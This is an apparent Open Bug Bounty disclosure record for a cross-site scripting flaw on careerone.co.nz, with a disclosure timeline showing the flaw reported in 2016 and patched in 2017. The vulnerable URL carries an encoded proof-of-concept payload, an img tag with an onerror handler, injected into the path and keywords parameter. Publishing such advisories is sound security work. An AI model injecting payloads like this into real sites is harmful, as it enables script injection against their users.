careerone.co.nz XSS vulnerability

2016-08-13T16:13:00
ID OBB:174249
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2017-07-27T23:31:00

Description

Vulnerable URL:
http://www.careerone.co.nz/jobs/waikato/advertising-media-arts-entertainment/advertisin%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22g-media-arts/?allisland=&ausjobs;=ausjobs&form;_method=popfilter&j;_s_category=11454&j;_s_location=54876&jobs;_returned_indeed=4&jobtype;=&popfilter;%5Bcategory%5D%5B%5D=11454&popfilter;%5Bkeywords%5D=advertisin%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22g-media-arts&popfilter;%5Blocations%5D%5B%5D=54876&popfilter;%5Bsalary%5D%5Bfrom%5D=30000&popfilter;%5Bsalary%5D%5Bto%5D=200000&q;=advertising-media-arts&salary;_from=&salary;_to=
Details:

Description| Value
---|---
Patched:| Yes, at 27.07.2017
Latest check for patch:| 27.07.2017 23:31 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check careerone.co.nz SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 August, 2016 16:13 GMT
Generic security notifications sent to website owner| 13 August, 2016 16:15 GMT
Vulnerability details disclosed by researcher| 5 November, 2016 17:14 GMT
Vulnerability patched by the website owner| 27 July, 2017 23:31 GMT